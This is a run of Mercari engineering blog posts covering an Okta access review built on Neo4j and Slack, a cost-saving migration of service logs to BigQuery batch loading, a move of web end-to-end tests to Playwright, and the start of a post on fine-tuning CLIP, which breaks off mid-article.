By adopting this collaborative and team-oriented approach, Mercari aims to deliver quality with speed and empowering teams to achieve better quality outcomes. Through active participation, comprehensive test planning, and efficient test development and execution, teams can strive for continuous improvement in software quality.

Overall, by implementing this approach to QA, Mercari enables teams to work together seamlessly, leading to enhanced communication, improved efficiency, and ultimately delivering high-quality software to users.

Join us in revolutionizing the way we approach quality and become a valued contributor at Mercari!

On Reviewing Employee Accesses Managed Through Okta

Wed, 31 Jan 2024 09:52:52 GMT

"By design, by default and at scale" are the driving values of the Security & Privacy division.

The Platform Security team was requested to lead efforts to review user access permissions in Okta. During this project, we had to deal with our legacy configurations and practices. Because of this, the "by design" and "by default" management wasn’t ideal. Regardless of the current state, we had to conduct our assessment "at scale" and cover the whole organisation.

This article describes how Mercari’s Security team approached this challenge.

Technologies:

TL;DR

We use Okta to grant most of our employees access to SaaS. Granting access is easy, but revoking them is harder.
To clean up unnecessary access, we used Neo4j to build a graph representation of our organisation and access to apps, then used Slack as our user interface to conduct assessments.

We asked employees to tell us if they needed all the access they had, excluding company-wide applications.
We then asked managers to confirm that these accesses made sense given job responsibilities.
Once collected, we could revoke self-reported unnecessary access directly through the Okta API.

Conducting this as code allowed us to scale the assessment to the whole organisation.

Introduction: How Did We Get Here?

Mercari is 11 years old tomorrow (February 1st 2024). While it is now a well-established company, it had to go through some growing pain like many teenagers of that age. The needs related to access management evolved over time as new employees joined and left while the company expanded. New internal services were introduced and decommissioned. Reasons for some past decisions were lost along the way.

Because we are heavily relying on SaaS solutions, Okta and Google Workspace are our solutions of choice to manage identities. When we started to work on this access review project, in Okta alone, we had around 8000 users, 500 active applications and 1400 groups. Deprovisioning access is relatively easy when someone is leaving. However, it is still a delicate operation during internal transfers. For newer employees, keeping things tidy is easier, but for longer-serving employees, reviewing accumulated accesses isn’t always easy. As a result, entropy increased and with it, the complexity made it hard to clean things up.

Terminal Goal of the Project

The ultimate goal for the security team is to reduce as much as possible the potential damages that would be caused by the abuse of system accesses.

Accessory Goals

Cleaning up accesses helps achieve a multitude of accessory goals:

Reduce the amount of entropy in our authentication systems.
Be able to present a clearer picture of what are the systems that are used by each employee/team.
Reduce the stress on security team members required to request system owners to explain if Mr K or Mrs W access is still necessary and document findings.
Reduce the amount of time spent trying to understand how things are managed and why.
Identify SaaS that we have that might not be necessary anymore.
Create better account life cycle management patterns, based on a clean state.
etc.

Possible Strategies

The Principle of Least Privilege is still one of the best ways to reduce the risk of accidents or incidents, but it requires efforts to apply and maintain.

Applying the principle of least privilege and achieving the Terminal Goal implies that we (should) know:

what are the systems we have,
who are the owners and administrators of these systems,
who has access to these systems and with which access rights,
the type of data each process and store,
the potential business processes that these systems are used for,
that we can draw a direct path between each employee, system, action they can take and the consequence of each possible action.

Doing so requires a monumental amount of work to establish and maintain.

Let’s do some quick maths based on Okta numbers: 8000 users by 500 apps, directly assigned, or through one of the 1400 groups, multiple users per app, multiple users per group, sometimes multiple groups per app, linked to the organisation structure and all teams, that total up to over 200,000 relations in our case. At this stage, we don’t even know the access level of each user, the type of data processed or stored by each system, and the potential actions possible by users.

Starting with only what we know from Okta: if I was to spend 1 second per relation, assuming that I have all the information to make a judgement within that second, I would still have to spend 55 hours straight to review these 200k relations. Obviously having a single person reviewing everyone’s access isn’t a reasonable approach.

Let’s go through some of the other possible strategies we could use.

Strategy 1: Reduce The Scope to Critical Systems Only

What is a critical system? based on what criteria? Anyone who tries to define these criteria knows that it’s easy to get lost in all the possible parameters. There is no magic, the complexity needs to be somewhere. If we chose the strategy to identify critical systems or systems containing sensitive information, someone (or a team) would still need to go through all systems and classify them by understanding what they are used for and what kind of users should have access.

At the same time, we have a good idea of what our systems are. Starting somewhere makes more sense than collecting everything, and then getting depressed looking at the unclimbable mountain ahead. Once at the top, everyone would be tired or would have resigned already.

Another issue is that the environment will not stop moving while this assessment is being done. Before they are done, new systems will have been introduced, users will have been added, and systems will be used for new use cases. We can’t freeze a flowing river to count all the fish in it.

Strategy 2: Full Scope, Asking System Owners

What if we asked system owners? 500 apps, with a number of users ranging from 1 to all employees + contractors. If each system owner has an average of 10 systems, this means that there are still 50 people who would each have to look at around 4000 accesses and make a judgement if these users should have access or not, based on job descriptions, the nature of the service or data accessed. At one point, this might be necessary, at least for some critical systems, but this is not a viable approach in our initial state of high entropy.

Additionally, system owners tend to be managers or directors. Their time is precious. Anyone with limited time will prioritise, and this task is likely to be pushed back to later, no matter how important it is.

Strategy 3: Ask Users First, Then Managers to Confirm Answers

We can ask the users if they still need access to systems before asking anyone else.

The approach we decided to take is exactly that: ask employees first.

Do you still need access to all these systems? Yes/No/Not Sure.

Once answers are collected (or the deadline expired), we ask their manager:

Given the roles and responsibilities of your members, can you review their answers and confirm that their access makes sense?

We didn’t go as far, but a third level of review would then be to then ask System Owners

These teams are using your system. Given what this system is used for, are you ok with them accessing it?

This strategy brings down the decision to keep or revoke access to the people who will actually use these accesses. It also has the advantage of distributing the assessment to all employees. Sadly for the managers, they will also have to review all of the apps that their members say that they need access to, but that assessment can go relatively quickly since they just need to confirm. Doing a quick sanity check normally takes under 5 minutes per person. Some cases might take more, but can be clarified through direct messages.

Through this process, we want to catch outlier cases like "Mr. Y in Security has access to the Payroll system". Even if Mr. Y says "I need it", we at least want the manager to do a sanity check.

Many times, comments we got from members while running this campaign were more "I didn’t even know I had access to that" or "What is this service in the first place?".

Because of how Okta is used, we know that the chosen strategy isn’t perfect yet: Okta is granting access to the app. In our case, it is rarely used to assign rights within the application. This is delegated to the system owners. Removing access in the first place already makes a significant difference and clean-up can be done later. At that time, we can prioritise a few critical systems.

How A Campaign Is Conducted

We now know Why we are doing the assessment, we know WHAT systems will be covered, and WHO will answer and review. Now, HOW will we ask everyone and collect their answers?

The Spreadsheet Assessment Strategy (nope)

200,000 rows with all the users/groups/apps don’t fit in a Google Spreadsheet and would be ridiculous to ask everyone to open and review. Ensuring that the integrity of the sheet is preserved is possible, but requires more work.

Web Based Assessment (maybe later)

While it would work, we also decided not to create a web page to conduct the assessment, at least not at this stage.

Okta Identity Governance Access Certification Campaign Feature (won’t work)

Okta does offer an identity governance access certification feature. I can see this working well if Okta is configured from the ground up knowing that it will be used to perform access reviews in the future. Owners would need to be assigned to groups, these groups would be assigned to applications. While conducting the campaign, group owners would be requested to confirm that group members should have access. This assumes that the group owner is able to judge if the user should have access. A group would then likely represent a team, and the administration of the members would be delegated to the managers. That team group would need to be assigned to the needed applications by an App Owner. However, Okta doesn’t have attributes to define App Owners (at this time).
This approach would be fine for normal cases, but exceptions would need to be managed through other groups, assigned to someone who would be aware of these exceptions.
In our current state, that was not a viable solution since groups are generally (but not always) used to grant access to apps, not to represent teams. This also means that we don’t have owners assigned to these groups, which would be hard to fix since our documentation of system owners requires some improvements.

Slack + Backend + Neo4j (selected)

We decided to use Slack as our user interface, and Neo4j as the backend database. Using a graph database as the backend actually allowed us to (relatively) easily query team members, their managers, and all access they had and through what group. For now, we also decided to exclude from our scope the review of access granted within the application.

The rest of this blog post will be dedicated to describing our process.

We had to go through a certain number of steps to proceed with our assessment:

Recover the organisational structure
Recover Okta Apps, Groups and Users, as well as all memberships and direct accesses
Create our Graph representation of the organisation and access
For each team and employee: Produce a Slack form requesting them to confirm which access is still needed
Collect answers from Users
For each manager: produce a Slack form and ask if they agree with the apps needed by their members. In the absence of an answer from the user, the Manager has to make the call
Collect answers from Managers
Sanity check: Review answers for spot absurdities
Revoke app access and group membership through the Okta API.
Document all the changes.

All the operations above with the exception of Step 8 are conducted through code. This allows us to reliably reproduce the process at will.

Representing The Organisation Structure And Access Rights In A Database

Okta’s user can be configured to have attributes describing the team and the manager, but because of some inconsistencies, we ended up having to extract the full structure from a different source, and then had to link that structure with the users in Okta. Having the organisation structure available in the graph allowed us to conduct based on a higher level of hierarchy, which was quite convenient.

We could then extract from Okta the relations between apps, groups and users for a given organisation unit or team.

Image 1: Integrating Okta and HR data into Neo4j graph database, visualised with Mermaid.js.

Schema: Relations between Org Units, teams, managers, members, groups and apps

In an effort to prevent over-engineering, at least initially, we decided to take some shortcuts and use the OktaUser node as our unit for each employee. The reality is more complex and requires identifying principals differently, but at this stage it was sufficient.

Image 2: Schematic representation of the relationships within the database, visualised using Mermaid.js.

Once written into our Neo4j database, we then had a queryable representation of our organisation, the teams, and the apps used by each of them. Here is what the graph looks like for the organisation structure:

Image 3: Visual depiction of Mercari’s organisational structure, created using Neo4j’s web interface.

The queries below translate to:

For all direct members of the "Platform Security" team with access to active Okta Apps:
- Get the manager
- Get if they used these applications in the last 90 days
Return the Org node, Manager node, Properties of the relation between the user and the app, Properties of the last use, and the App node

Then again, taking into consideration access to apps through group membership.

// Team: Platform Security

MATCH (o:OrgUnit {name: "Platform Security"})<-[:IS_MEMBER_OF]-(u:OktaUser)-[r:HAS_ACCESS_TO]->(a:OktaApp {status: "ACTIVE"})
WITH o, u, r, a
MATCH (u)-[:IS_REPORTING_TO]-(m:OktaUser)
WITH o, m, u, r,  a
OPTIONAL MATCH (u)-[p:HAS_USED]->(a)
RETURN o, m, u, PROPERTIES(r) AS r, PROPERTIES(p) AS p, a

MATCH (o:OrgUnit {name: "Platform Security"})<-[:IS_MEMBER_OF]-(u:OktaUser)-[r:IS_MEMBER_OF]-(g:OktaGroup)-[:HAS_ACCESS_TO]->(a:OktaApp {status: "ACTIVE"})
WITH o, u, r, g, a
MATCH (u)-[:IS_REPORTING_TO]->(m:OktaUser)
WITH o, m, u, r, g, a
OPTIONAL MATCH (u)-[p:HAS_USED]->(a)
RETURN o, m, u, PROPERTIES(r) AS r, PROPERTIES(p) AS p, g, a

Query 1: Retrieving application and group access listings for specific teams using Neo4j Cypher.

Launching a Campaign

The campaign Controller (app) relies on a list of teams to identify the users to target. The recursive list of teams can easily be extracted from the Neo4j database with a query like this:

MATCH (t:OrgUnit)-[:IS_PART_OF*]->(o:OrgUnit) WHERE o.name = "Security & Privacy" AND t.status = "active" 
RETURN t.name AS team, t.orgId AS orgId, o.name AS orgName

Query 2: Recovering a recursive team hierarchy under ‘Security & Privacy’ category with Neo4j Cypher.

Based on the list of teams in scope, the Controller notifies managers that an assessment is starting, creates the assessment for each team member and sends forms through Slack direct messages.

Sending Member Assessments

Image 4: Sequential flow chart detailing the member campaign process, illustrated with Mermaid.js.

The assessment form sent to members is kept simple and is meant to be quick to fill. A user can click on the application name to connect to the app and confirm if they still need access to it, then select “Access needed” or “No need anymore”.

Image 5: Example of a member evaluation form, as displayed in Slack.

Answer Collection Backend

Once the assessment forms are sent, we only need to wait for answers. We have a backend ready to receive them and update the Neo4j database with the answers.

Image 6: Flowchart illustrating the procedure for gathering responses from the evaluation form, visualised using Mermaid.js.

Manually during the assessment, we are able to send progress updates to the managers, asking them to check with their team members if they haven’t answered yet.

Manager Answer Review

Once we have collected answers, even if a member didn’t answer or complete the assessment, we request Managers to review accesses. This step normally goes quickly since answers from members are visible, and applications related to the teams should be well known.

In the case where a manager isn’t responding, we can then report to their managers the lack of progress.

The review flow for managers looks like this:

Image 7: Sequence diagram outlining the managers’ review workflow, visualised using Mermaid.js.

The form sent to the manager is similar to the one sent to the user but only contains apps marked as needed. The manager can then see the member’s answer and select to keep or remove if they judge that the access is necessary.

Image 8: A glimpse into the manager review form interface within Slack.

Unnecessary Access Clean-Up

At this stage, we have collected answers from members, as well as collected confirmations from managers. We could request system owners to confirm that they agree that teams should have access (as opposed to individual access review), but we decided to push this to a later assessment.

The access revocation flow through the Okta API is relatively simple:

Image 9: Flowchart depicting the steps involved in the access revocation mechanism, visualised with Mermaid.js.

Conclusion

Through this project, we could review what access employees had and said they needed by trusting our employees and managers to answer truthfully. Most standards, frameworks, regulations and best practices require companies to do this kind of review on a regular basis. Such reviews can quickly get out of hand in a complex environment. This is where moving the complexity of handling relations between employees and applications into a graph database, and asking employees first if they needed the access helped us scale the assessment to the size of the company. We were also able to conduct this assessment without going through a lengthy system classification exercise. Because we rely so much on Okta, focusing on it allowed us to cover a majority of systems.

There are still improvements possible to this flow and expansion to other systems. Tighter access granting rules and checks could be implemented into the provisioning process.

Meanwhile, we could already remove a significant amount of accesses that weren’t needed anymore without any risk of access interruption since removal is based on employees’ and managers’ answers, instead of using determined rules to decide if access should be suspended or not…

Cost-Effective Strategy for Migrating Service Logs to BigQuery | SRE Intern Blog

Mon, 29 Jan 2024 14:12:54 GMT

Hello, I’m @笑歌Amadeus, a Site Reliability Engineer Intern, working in the Platform/SRE team at Mercari.
In this blog, I’ll detail the project I took part in during my internship period (2023.11 – 2024.1), where I tackled the challenge of migrating service logs to BigQuery tables as a cost-effective manner.

Introduction

Recently, the SRE team started to investigate possible ways to reduce costs at Mercari Shops, because system costs were growing disproportionately to our business growth.
In Mercari Shops, the log data is stored in Google BigQuery and is used to analyze product incidents. We currently use Cloud Logging Sink to export log data into BigQuery tables directly from Google Cloud Logging. Cloud Logging Sink inserts streaming logs into BigQuery tables via small batches in real time, which is called streaming insert. However, as the number of requests and logs have increased, we have found that the cost of streaming insert into BigQuery tables has also significantly increased.
To address this issue, we designed and implemented a more cost-effective method for log data migration. The new method is expected to reduce the entire streaming insert cost substantially.

Streaming Insertion Method

The existing log data migration method was based on the Cloud Logging Sink (streaming insert). Logs generated in Microservices are first stored in Cloud Logging. The data is then transmitted to the specified BigQuery tables in real time through Cloud Logging Sink. This process results in significant costs as we generate a large number of log data every month. This streaming insert cost accounts for more than 68% of the total cost of the Streaming Insertion method, and the cost of data storage is difficult to reduce. Therefore, optimizing the cost of the streaming insert is currently the most pressing issue.

Figure 1: the streaming insertion method

Batch Loading Method

BigQuery External Tables (Rejected Method)

The first idea is to store data in GCS and use BigQuery external tables for querying because loading data to GCS via Logging Sink is free. External tables are similar to standard BigQuery tables but their data resides in an external source.
However, this approach would potentially extend query times by up to a factor of 100 compared to query to the standard BigQuery tables. Additionally, due to the repeated reading of data, the costs of a single query can sometimes exceed $10.
Furthermore, using an external partitioned table preserves the logical partitioning of your data files for query access, which in turn speeds up data querying. The external partitioned data must use a default Hive partitioning layout but Cloud Logging Sink can not apply formats that support partitioning when exporting log data to GCS.
This is why we chose not to utilize external tables for queries.

Batch Loading (Winning Method)

After investigation, we found that in addition to streaming insert, we can also use batch loading to ingest data into BigQuery tables. Unlike the high cost of streaming insert, batch loading is free, although it requires sacrificing the real-time performance of data migration [1]. In fact, it turned out that real-time data is not necessary for our team, and updating the log data every hour is enough. So we planned on using a scheduled workflow to batch load data hourly.
In practical terms, the main difference between the previous implementation and the new batch loading method is that instead of going directly from Cloud Logging to BigQuery, our data is first transferred to GCS buckets. We then periodically batch load the data from GCS to BigQuery via hourly Cloud Run Jobs.

Figure 2: the batch loading method with GCS and Cloud Run

Cost Saving Analysis (Impact)

In order to clearly show the cost reduction and the impact of the Batch Loading method, simulating the cost calculation will be a good way. For all calculations that follow, we will assume that we are dealing with 100TB of raw logs unless otherwise specified. This does not reflect the actual amount that Mercari processes, but it is meant to be a nice reference number to show the actual cost savings. Using this number, implementing the Batch Loading migration method results in the total cost dropping from $8,646 to $2,371.

Cost of Streaming Insertion method

Streaming insert had a cost implication of $0.012 per 200MB [1]. To project the costs for streaming inserting 100TB of logs into BigQuery tables, one would be looking at around $6,291 [2]. Additionally, storing this data within BigQuery incurs a fee of $0.020 per GB. Consequently, the storage expense would have total approximately $2,355 [3].
Hence, managing logs with BigQuery could translate to an expenditure of $8,646 [4] for per 100 TB’s data. This method could result in significantly high costs.

Cost of Batch Loading method

By implementing the Batch Loading method, we are incurring the storage costs for GCS and BigQuery, which happen to be identical at $0.020 per GB. Generally, this cost component will be the same as with the Streaming Insertion method because we remove the data from GCS immediately after loading it into BigQuery. For Cloud Run, if we have 1 vCPU and 1GB memory of migration job, the cost of cloud run is $0.000018 per vCPU-second and $0.000002 per GiB-second [5]. Assuming that the Cloud Run jobs will take 10 minutes each hour, the Cloud Run jobs will take $16 every month [6]. This cost is much smaller than the cost of streaming insert.

Outcome

The outcome is shown in Figure 3 and tables below.

	Streaming Insertion Method	Batch Loading Method
Data Load Cost / 100TB	$6,291 (Streaming Insert)	$0 (Batch Loading)
Storing Cost / 100TB	$2,355 (BigQuery)	$2,355 (BigQuery + GCS)
Job Cost /100TB	$0	$16 (Hourly Cloud Run Jobs)
Total Cost	$8,646	$2,371

Figure 3: Cost saving analysis

Issues Encountered

We encountered several issues during the implementation of the Batch Loading method.

1. Possible Duplicate Inserts

We sometimes saw duplicate inserts during our hourly Cloud Run Jobs. These were due to the fact that when a job took more than an hour, the next Cloud Run job would start before the previous one had completed, which resulted in duplicate log ingestion. To resolve this, we implemented a locking mechanism to prevent new jobs from running until the ongoing jobs finished.

2. Schema Column Data Type Mismatches

When the auto-schema parameter is set for the bq load command, BigQuery will automatically infer a matching data type based on the loaded data. However BigQuery sometimes misinterprets numeric strings as integers during schema auto-detection. Because of this BigQuery threw errors when it initially misinterpreted the data type for a column as numeric, but subsequently received a string. To address these issues, we decided to manually define the schema for all tables in BigQuery and compare it with the proposed auto-detected schema to rectify discrepancies.

3. `bq load` Command Succeeded But No Data was Loaded

Sometimes the bq load command produced an empty table even though it reported success. It was later discovered that this was due to the expiration properties of the data [7]. The table had a partition expiration setting of 7 days, and the migrated records were from beyond that period, resulting in their removal from the active partitions of the table. Finally we ignored this issue.

4. `bq load` Command Failed When the Migrated Data Volume was Too Large

During testing in the PROD environment, accumulated data in GCS caused the bq load command to fail because it exceeded the maximum size per load job of 15TB [8]. To resolve this, we limited the number of files processed by the script and changed the file transfer strategy from transferring the entire folder to selecting specific files.
We encountered the ‘Argument list too long’ issue related to the previous one when selecting specific files for transferring. Specifically, this issue was due to passing many file paths as arguments exceeded the maximum length limit for command arguments, which MAX_ARG_STRLEN defines. To address this, we assessed the maximum length and reduced the number of imported files to ensure that the MAX_ARG_STRLEN limit is not exceeded (131072 bytes) [9].

Internship Impressions

My contributions

I implemented the Batch Loading method in the services of Mercari Shops for both the development and production environments, with details as follows.

Created BigQuery tables, GCS buckets, Cloud Logging Sink and IAM permission with Terraform.
Checked the existing schema of BigQuery tables and generated schema files.
Created Datadog monitor to monitor the failed Cloud Run Jobs and send alerts.
Discontinued previous migration method by removing existing Cloud Logging Sink.
Completed runbook and some documents for the Batch Loading method and the issues we have faced before.

Challenge & Improvement

As the only non-Japanese member of the SRE team, it took me some time to adjust to conducting meetings and daily work in Japanese. The members of the team worked hard to communicate with me in easy-to-understand Japanese, and English was the main language when writing daily Pull Requests and documents. After the internship, I felt that my Japanese language skills had improved a lot, which is a very valuable thing for me if I plan to work in Japan in the future.
Before Mercari’s internship, I had no development experience with Terraform, Datadog, GitHub Actions or other SRE-related technology stacks. Using a new technology stack from scratch is also a challenging aspect of this internship. Today, as the internship is coming to an end, I can say that I have some practical experience with the above tools.
I also experienced a difference between Mercari and the two companies that I have previously worked at, which were a startup and a fintech company, respectively. The development experience in Mercari was undoubtedly the best. Multiple sets of automation tools help Engineers simplify the development process and reduce possible human errors. In addition, the strictness of the Pull Request review within the group is also different from previous internships. I think starting a career from Mercari is a great option for New Grads.

Work Experience

As my fourth internship, Mercari stands out as the most tech-centric environment I’ve been a part of. It’s a place where engineers are provided with an optimal development experience, enabling them to create incredible products that unleash the potential in all people.
Mercari’s Culture and Mission breathe through our day-to-day work; faced with options, team members consistently favor boldness and the pursuit of meaningful impact, even at the risk of failure.
Additionally, the monthly intern dinners hosted by our Teaching Assistants have been excellent networking opportunities, allowing me to forge new friendships and engage with other teams. I also had the privilege of participating in Mercari’s year-end party, an experience rich in Japanese tradition and a wonderful way to immerse myself in the company culture.

Figure 4: Year end party

Advice for new interns

During my internship I found that effective communication was crucial, especially when not using my native language. So it’s best to do everything you can to let your mentors and managers know your progress, challenges, and other issues. You can also take the initiative to engage in 1on1 and cafe chat with team members to deepen your relationship.
Other than that, I recommend staying bold. Everyone in the company will try to help you, so why not try something more challenging? This will help you grow quickly.

In Closing

I eagerly anticipate the chance to leverage internship opportunities to gain exposure to various companies and explore different roles during my time as a student. Such experiences are bound to leave a profoundly positive mark on my career trajectory. Without question, Mercari has provided me with an unparalleled internship experience. I must also extend my gratitude to my manager, mentor and team members for their patience with my errors and their willingness to respond to my inquiries. My heartfelt thanks to all!
Mercari is currently recruiting for interns throughout the year, so if you are interested, please apply below!
Students | Mercari Careers

Acknowledgment

I’d like to acknowledge @ganezasan, who laid the groundwork for this project through his initial design and investigative efforts. And also acknowledge @G0G0BIKE, who mentored me and gave plenty of meaningful feedback in my internship period.

Reference

[1] https://cloud.google.com/bigquery/pricing#data_ingestion_pricing
[2] $0.012 × (100TB × 1024 × 1024 / 200MB)
[3] $0.023 × 100TB × 1024
[4] $6,291 + $2,355
[5] https://cloud.google.com/run/pricing
[6] $0.000038 × 600s × 24h × 30d
[7] https://stackoverflow.com/questions/25452207/bigquery-load-job-said-successful-but-data-did-not-get-loaded-into-table
[8] https://cloud.google.com/bigquery/quotas#load_jobs
[9] https://www.in-ulm.de/~mascheck/various/argmax/

Renovate Web E2E tests with Playwright Runner

Sun, 24 Dec 2023 11:00:44 GMT

Hello everyone! I’m @jye, a QA engineer at Mercari. This post is for Day 24 of Mercari Advent Calendar 2023.

In Mercari, QA engineer not only assists the development team with testing during the development cycle, but also responds to automation E2E tests on all platforms (iOS, Android, Web, and API).

Recently, we have made an update to our automation end-to-end (E2E) test system for the Web platform. In the old system we had encountered several issues including problems with remote browser connections, problematic retry mechanisms in certain situations, and missing test cases in the report. In the following section, I will introduce the changes that were made and explain the reasons behind them.

About the renovation, we have made two significant changes for the Web E2E test system. First, we have transitioned our test framework from Jest-playwright to Playwright. Secondly, we change the architecture for the remote browser and the CI platform. It was changed from running the regression test on CircleCI with the remote browsers which were deployed by Moon, to the Github Actions self-hosted runner which is deployed in the internal kubernetes cluster with the Playwright supported browser binary.

About the old E2E test system

Architecture diagram for the old E2E system

Originally, we used Jest-playwright and ran it on CircleCI. In order to connect to our Web dev environment, we needed to allow the access from external CircleCI IPs, but due to security concerns, we couldn’t whitelist all of CircleCI’s IPs. Therefore, we found a solution which was using Moon, a service that helps to deploy browsers in the kubernetes cluster. So CircleCI was only responsible for running the E2E code and it connected to the remote browsers which were in the internal cluster, therefore, the browser can access to our Web dev environment.

The problems of the old E2E system

We have been using our old E2E system for three years, and it has been incredibly useful to run regression tests before releasing the new version of Mercari Web to production. Additionally, the report assists us in tracking and analyzing the flaky tests with every test run. However, as time passed and the number of test cases increased, we gradually discovered various problems.

1. Jest-playwright is out of date

Over the years, Playwright has become matured over these years. However, Jest-playwright has slowed down its support for adding new features and has now announced that they recommend using native Playwright as the test framework.

When we started to build the old E2E system, we chose Jest-playwright because Playwright had limited feature support for writing test cases at that time. Moreover, our developers were already familiar with the popular test framework Jest, making it quicker to build Jest-like UI tests using Jest-playwright. However, Playwright has incorporated more commonly used test functions and features for UI E2E testing. We will need to change the framework to get more flexibility and optimized features for our E2E test.

2. Remote browser connection issues

Another issue we encountered was with the remote browsers provided by Moon. Since the browsers are controlled by another service within the cluster, the browsers are not normally launched in large numbers. However, for E2E test with a high number of cases, parallel execution is often required, which leads to a high number of connections. Optimizing the pod resources to handle this efficiently is not straightforward. Additionally, each test case needs to wait for a browser connection to start executing, which ultimately slows down the overall execution speed of individual E2E test. Some cases even fail to execute because the browser connection cannot be established within the given timeout.

3. Problematic retry mechanism in certain situations

In the old E2E system we wanted to use the jest.retryTimes option to retry failed tests, but the reporting library that we were using called "Jest-allure" only worked with the "Jest-Jasmine2" test runner, which in turn did not support the jest.retryTimes option. Instead of that, it provides a command line option called --onlyFailures which allows the execution of only the failed cases from the previous run based on the status cache.

For example:

 npm run test ||
 npm run test --onlyFailures ||
 npm run test --onlyFailures

This option seems like a viable alternative for retry. However, it’s critical that if the test case fails due to a remote browser connection issue, Jest will not record those tests in the status cache. As a result, these test cases will not be retried in the subsequent runs with the command line option.

4. Some test cases were missing in the report

As mentioned previously, we use the report library called "Jest-allure" which generates the report based on the latest test run. This means that if there is a remote browser connection issue during the test run, those test cases will never appear in the report. This can be quite confusing when checking the report. In the worst-case situation, when the Moon environment is unstable, there is a possibility of losing over 50% of the tests in a single end-to-end run. This instability can greatly impact the reliability and completeness of the test results.

Example for missing the test record in test report

The main challenge and the solution

The most challenging part is not updating the framework or refactoring the code. It’s actually keeping our old E2E system running, as it is an important check before the release and engineers also confirm regression by running the E2E test. The migration will take more than a few days, so we can’t just stop our E2E tests and make everyone wait until the framework migration is done. Additionally, development for the web is ongoing, so we also need to keep our page object elements and test cases up to date during the migration period.

Due to the heavy usage of the E2E tests every week to ensure the stability of our web application in each release, we have made the decision to create a new E2E repository. During the migration period, we will need to update the elements and test cases for both the old and new repositories to maintain their functionality. However, this decision gives us more flexibility to implement all desired changes in the new repository without affecting the current usage of the E2E tests.

The solution to the first issue is relatively straightforward. We just need to update the style and function to use Playwright. Once we finish setting up the necessary configuration, we can start assigning the test cases to our team members. Their task will involve making the required changes and ensuring that all test cases can be successfully executed using the new style with Playwright.

Regarding the second issue, our CI/CD team has started providing a self-hosted runner that is built within our network. This means we can now use the Playwright built-in browser binary and are no longer limited to using Moon. So we can just create some GitHub Actions workflow to make our E2E test running on the self-hosted runner.

As for the third issue, since we have recently started using Playwright, we can easily switch to using its built-in retry mechanism. We can achieve this by applying the necessary configuration changes in the corresponding config file.

Example for playwright.config

 const config: PlaywrightTestConfig = {
   retries: 2,
}

And finally, for the missing test cases in the report, we can actually resolve it by using Playwright’s built-in browser binary on the self-hosted runner. Since there are no more connection issues to the Moon, the missing test case in the report problem is automatically solved. However, we still plan to leverage the HTML report provided by Playwright to improve the visibility of the test results. As part of this plan, we also create a CI workflow that stores the report in cloud storage and hosts it as a static page. This way, everyone will have easier access to view the report and track the test results.

As a result, not only have we successfully migrated our library, but we have also resolved the issues present in the old E2E test system. The performance has improved, and we have even managed to reduce costs by eliminating the need for the Moon license.

Architecture diagram after the migration

Conclusion

The overall migration took around half a year. Because the QA team will need to mainly help with other teams development testing and will use the rest of time working on automation improvement.

Although the system update did not involve using any latest new technologies, it effectively addressed the long-standing problems. With the enhanced capabilities offered by Playwright, we expect our utilization of the E2E test system to become even more flexible. We hope to have the opportunity to share further improvements and new measures for E2E test systems in the future.

Additionally, thanks to the CI/CD team providing the internal self-hosted runner service. This has greatly facilitated CI processes that typically require careful consideration of security concerns.

Tomorrow is the final article of the Advent Calendar 2023 by kimuras, CTO of Mercari. Look forward to it!

Fine-Tuned CLIP: Better Listing Experience and 80% More Budget-Friendly

Sat, 23 Dec 2023 11:00:40 GMT

This post is for Day 23 of Mercari Advent Calendar 2023, brought to you by a 2023 New Grad, @andy971022, from Mercari’s US@Tokyo Machine Learning team. For those curious about the term “US@Tokyo”, it represents a team serving Mercari’s US marketplace while being based in Tokyo.

Introduction

Pre-filling the category, brand, title, and color fields when a user uploads an image during listing has been a long-living feature in both Mercari JP and US. However, little do people know the engineering efforts put behind the feature that supports half a million listings daily.

Example of the Service

In this episode, we’ll demonstrate how we conducted fine-tuning on CLIP (Contrastive Language-Image Pre-Training) to significantly boost the performance of item category and brand prediction, requiring users to input fewer fields and hence improving the listing experience overall. In addition to streamlining user experience, our efforts yielded an impressive 80% reduction in serving costs, highlighting the cost-effectiveness of our approach.

Background

We started our journey with InceptionV3, a 24-million parameter, 5000+ class classification model trained on millions of Mercari listing images. The model is not used to directly predict the item fields as we have more brands and categories than do classes. Instead, we extracted the embedding from the listing image and probed that into a vector index of 50-100 million item image embeddings generated using the same model to retrieve top-K similar items. These similar items were then collected for a vote on the brand and category.

Earlier this year, we migrated this ML service to a GCP-managed service, namely, Vertex AI Vector Search (previously known as Matching Engine) and updated from using InceptionV3 to using a CLIP variant as part of our ongoing pursuit to simplify and elevate the selling experience of our users. But why CLIP?

CLIP

CLIP was released in early 2021 and stood as the best Zero-Shot Pretrained Contrastive Learning model at the time. Capable of comprehending both text and image inputs, CLIP has a base version of 151 million parameters that outputs 512-dimensional embeddings. Interestingly, CLIP naturally excels as both an image and a text encoder.

We can see from the pseudo-code of CLIP’s model architecture below that an L2-normalization is applied to both image and text embeddings after the final projection. Intuitively, it is mapping text/image embeddings to the surface of the same hyper-dimensional unit sphere, meaning that all the points on the surface are equidistant to the center of the sphere having an Euclidean distance of 1.

(Source: (Left) Learning Transferable Visual Models From Natural Language Supervision, https://arxiv.org/pdf/2103.00020.pdf, (Right) Understanding Contrastive Representation Learning through Alignment and Uniformity on the Hypersphere, https://arxiv.org/pdf/2005.10242.pdf)

The InfoNCE loss maximizes the distance between unalike image-text, image-image, and text-text pairs and minimizes it for those that are alike. Figuratively, it forces the model to “use up” all the spaces on the surface of that sphere (uniformity) while keeping similar inputs close (alignment). This mimics the process of conducting a clustering method on the embeddings which eases downstream tasks such as classification or similarity search.

(Source: InfoNCE Loss Provably Learns Cluster-Preserving Representations, https://arxiv.org/pdf/2302.07920.pdf)

Optimizing Model Performance and Cost

After the migration, we saw an opportunity to improve our system from a model performance and cost perspective.

Publicly available CLIP variants output embeddings of dimension 512 at the smallest, and optimization is essential as they currently stand at a performance level similar to the internally trained InceptionV3 model.
Scaling down/up resources for cost savings isn’t straightforward with Vertex AI Vector Search being a managed service.

These seemingly different problems turned out to have a single common solution – CLIP Fine-Tuning + Dimensional Reduction.

Improving the model’s performance can be considered a domain-specific task, which is commonly tackled by adding and training extra linear layers at the end of the model, so-called fine-tuning. With the extra linear layers, the resulting dimension of the output embeddings can also be specified. Another common dimensional reduction approach, PCA, or Principal Component Analysis, is not a viable solution in this context due to its non-lossless compression nature, often resulting in performance degradation.

